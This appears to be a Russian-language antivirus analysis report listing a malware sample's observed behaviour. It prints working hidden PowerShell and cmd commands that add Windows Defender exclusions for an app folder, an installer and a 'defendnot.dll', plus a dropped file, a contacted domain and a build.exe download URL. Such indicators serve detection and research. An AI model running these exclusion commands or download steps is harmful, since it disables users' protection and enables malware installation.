Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -NoProfile -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\MyApp'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -NoProfile -Command "Add-MpPreference -ExclusionProcess '%LOCALAPPDATA%\MyApp\installer.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -NoProfile -Command "Add-MpPreference -ExclusionProcess '%LOCALAPPDATA%\MyApp\defendnot.dll'"
- %TEMP%\soso.exe
- 'xa##nak.ru':80
- http://xa##nak.ru/build.exe
- DNS ASK xa##nak.ru
- '%TEMP%\soso.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -WindowStyle Hidden -NoProfile -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\MyApp'"
- '<SYSTEM32>\cmd.exe' /c powershell.exe -WindowStyle Hidden -NoProfile -Command "Add-MpPreference -ExclusionProcess '%LOCALAPPDATA%\MyApp\installer.exe'"
- '<SYSTEM32>\cmd.exe' /c powershell.exe -WindowStyle Hidden -NoProfile -Command "Add-MpPreference -ExclusionProcess '%LOCALAPPDATA%\MyApp\defendnot.dll'"